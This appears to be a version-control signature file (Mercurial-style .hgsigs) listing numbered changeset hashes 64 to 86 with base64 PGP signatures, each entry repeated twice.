64 0c10cf8191469e7c3c8844922e17e71a176cb7cb 0 iD8DBQBQvQWoywK+sNU5EO8RAnq3AJoCn98u4geFx5YaQaeh99gFhCd7bQCgjoBwBSUyOvGd0yBy60E3Vv3VZhM=
65 a4765077b65e6ae29ba42bab7834717b5072d5ba 0 iD8DBQBQ486sywK+sNU5EO8RAhmJAJ90aLfLKZhmcZN7kqphigQJxiFOQACeJ5IUZxjGKH4xzi3MrgIcx9n+dB0=
65 a4765077b65e6ae29ba42bab7834717b5072d5ba 0 iD8DBQBQ486sywK+sNU5EO8RAhmJAJ90aLfLKZhmcZN7kqphigQJxiFOQACeJ5IUZxjGKH4xzi3MrgIcx9n+dB0=
66 f5fbe15ca7449f2c9a3cf817c86d0ae68b307214 0 iD8DBQBQ+yuYywK+sNU5EO8RAm9JAJoD/UciWvpGeKBcpGtZJBFJVcL/HACghDXSgQ+xQDjB+6uGrdgAQsRR1Lg=
66 f5fbe15ca7449f2c9a3cf817c86d0ae68b307214 0 iD8DBQBQ+yuYywK+sNU5EO8RAm9JAJoD/UciWvpGeKBcpGtZJBFJVcL/HACghDXSgQ+xQDjB+6uGrdgAQsRR1Lg=
67 a6088c05e43a8aee0472ca3a4f6f8d7dd914ebbf 0 iD8DBQBRDDROywK+sNU5EO8RAh75AJ9uJCGoCWnP0Lv/+XuYs4hvUl+sAgCcD36QgAnuw8IQXrvv684BAXAnHcA=
67 a6088c05e43a8aee0472ca3a4f6f8d7dd914ebbf 0 iD8DBQBRDDROywK+sNU5EO8RAh75AJ9uJCGoCWnP0Lv/+XuYs4hvUl+sAgCcD36QgAnuw8IQXrvv684BAXAnHcA=
68 7511d4df752e61fe7ae4f3682e0a0008573b0402 0 iD8DBQBRFYaoywK+sNU5EO8RAuErAJoDyhXn+lptU3+AevVdwAIeNFyR2gCdHzPHyWd+JDeWCUR+pSOBi8O2ppM=
68 7511d4df752e61fe7ae4f3682e0a0008573b0402 0 iD8DBQBRFYaoywK+sNU5EO8RAuErAJoDyhXn+lptU3+AevVdwAIeNFyR2gCdHzPHyWd+JDeWCUR+pSOBi8O2ppM=
69 5b7175377babacce80a6c1e12366d8032a6d4340 0 iD8DBQBRMCYgywK+sNU5EO8RAq1/AKCWKlt9ysibyQgYwoxxIOZv5J8rpwCcDSHQaaf1fFZUTnQsOePwcM2Y/Sg=
69 5b7175377babacce80a6c1e12366d8032a6d4340 0 iD8DBQBRMCYgywK+sNU5EO8RAq1/AKCWKlt9ysibyQgYwoxxIOZv5J8rpwCcDSHQaaf1fFZUTnQsOePwcM2Y/Sg=
70 50c922c1b5145dab8baefefb0437d363b6a6c21c 0 iD8DBQBRWnUnywK+sNU5EO8RAuQRAJwM42cJqJPeqJ0jVNdMqKMDqr4dSACeP0cRVGz1gitMuV0x8f3mrZrqc7I=
70 50c922c1b5145dab8baefefb0437d363b6a6c21c 0 iD8DBQBRWnUnywK+sNU5EO8RAuQRAJwM42cJqJPeqJ0jVNdMqKMDqr4dSACeP0cRVGz1gitMuV0x8f3mrZrqc7I=
71 8a7bd2dccd44ed571afe7424cd7f95594f27c092 0 iD8DBQBRXfBvywK+sNU5EO8RAn+LAKCsMmflbuXjYRxlzFwId5ptm8TZcwCdGkyLbZcASBOkzQUm/WW1qfknJHU=
71 8a7bd2dccd44ed571afe7424cd7f95594f27c092 0 iD8DBQBRXfBvywK+sNU5EO8RAn+LAKCsMmflbuXjYRxlzFwId5ptm8TZcwCdGkyLbZcASBOkzQUm/WW1qfknJHU=
72 292cd385856d98bacb2c3086f8897bc660c2beea 0 iD8DBQBRcM0BywK+sNU5EO8RAjp4AKCJBykQbvXhKuvLSMxKx3a2TBiXcACfbr/kLg5GlZTF/XDPmY+PyHgI/GM=
72 292cd385856d98bacb2c3086f8897bc660c2beea 0 iD8DBQBRcM0BywK+sNU5EO8RAjp4AKCJBykQbvXhKuvLSMxKx3a2TBiXcACfbr/kLg5GlZTF/XDPmY+PyHgI/GM=
73 23f785b38af38d2fca6b8f3db56b8007a84cd73a 0 iD8DBQBRgZwNywK+sNU5EO8RAmO4AJ4u2ILGuimRP6MJgE2t65LZ5dAdkACgiENEstIdrlFC80p+sWKD81kKIYI=
73 23f785b38af38d2fca6b8f3db56b8007a84cd73a 0 iD8DBQBRgZwNywK+sNU5EO8RAmO4AJ4u2ILGuimRP6MJgE2t65LZ5dAdkACgiENEstIdrlFC80p+sWKD81kKIYI=
74 ddc7a6be20212d18f3e27d9d7e6f079a66d96f21 0 iD8DBQBRkswvywK+sNU5EO8RAiYYAJsHTHyHbJeAgmGvBTmDrfcKu4doUgCeLm7eGBjx7yAPUvEtxef8rAkQmXI=
74 ddc7a6be20212d18f3e27d9d7e6f079a66d96f21 0 iD8DBQBRkswvywK+sNU5EO8RAiYYAJsHTHyHbJeAgmGvBTmDrfcKu4doUgCeLm7eGBjx7yAPUvEtxef8rAkQmXI=
75 cceaf7af4c9e9e6fa2dbfdcfe9856c5da69c4ffd 0 iD8DBQBRqnFLywK+sNU5EO8RAsWNAJ9RR6t+y1DLFc2HeH0eN9VfZAKF9gCeJ8ezvhtKq/LMs0/nvcgKQc/d5jk=
75 cceaf7af4c9e9e6fa2dbfdcfe9856c5da69c4ffd 0 iD8DBQBRqnFLywK+sNU5EO8RAsWNAJ9RR6t+y1DLFc2HeH0eN9VfZAKF9gCeJ8ezvhtKq/LMs0/nvcgKQc/d5jk=
76 009794acc6e37a650f0fae37872e733382ac1c0c 0 iD8DBQBR0guxywK+sNU5EO8RArNkAKCq9pMihVzP8Os5kCmgbWpe5C37wgCgqzuPZTHvAsXF5wTyaSTMVa9Ccq4=
76 009794acc6e37a650f0fae37872e733382ac1c0c 0 iD8DBQBR0guxywK+sNU5EO8RArNkAKCq9pMihVzP8Os5kCmgbWpe5C37wgCgqzuPZTHvAsXF5wTyaSTMVa9Ccq4=
77 f0d7721d7322dcfb5af33599c2543f27335334bb 0 iD8DBQBR8taaywK+sNU5EO8RAqeEAJ4idDhhDuEsgsUjeQgWNj498matHACfT67gSF5w0ylsrBx1Hb52HkGXDm0=
77 f0d7721d7322dcfb5af33599c2543f27335334bb 0 iD8DBQBR8taaywK+sNU5EO8RAqeEAJ4idDhhDuEsgsUjeQgWNj498matHACfT67gSF5w0ylsrBx1Hb52HkGXDm0=
78 f37b5a17e6a0ee17afde2cdde5393dd74715fb58 0 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
